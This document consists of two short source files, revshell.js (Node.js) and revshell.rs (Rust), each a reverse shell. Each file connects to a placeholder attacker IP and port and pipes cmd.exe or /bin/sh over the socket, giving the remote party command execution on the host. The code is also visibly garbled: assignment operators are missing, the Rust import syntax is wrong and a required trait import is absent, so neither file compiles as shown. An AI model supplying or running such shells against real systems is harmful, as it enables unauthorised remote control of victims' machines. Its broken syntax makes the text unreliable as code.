File: revshell.js
const net = require("net");

const { spawn} = require("child_process");

const client new net.Socket();

client.connect(attacker_port, "attacker_ip", () => {

const shell = process.platform === "win32" ? "cmd.exe": "/bin/sh";

const sh spawn (shell, []);

client.pipe(sh.stdin);

sh.stdout.pipe(client);

sh.stderr.pipe (client);

});

File: revshell.rs
use std::net:: TcpStream;

use std::os::unix::io:: AsRawFd;

use std::process:: (Command, Stdio);

fn main() {

if let Ok(stream) TcpStream::connect("attacker_ip:attacker_port") { let shell if cfg! (target_os = "windows") { "cmd.exe" } else { "/bin/sh" };

let fd stream.as_raw_fd();

Command::new(shell)

.stdin(unsafe { Stdio::from_raw_fd(fd) })

.stdout(unsafe { Stdio::from_raw_fd(fd) })

.stderr (unsafe { Stdio::from_raw_fd(fd) })

.spawn()

.expect("Failed to spawn shell");

}
}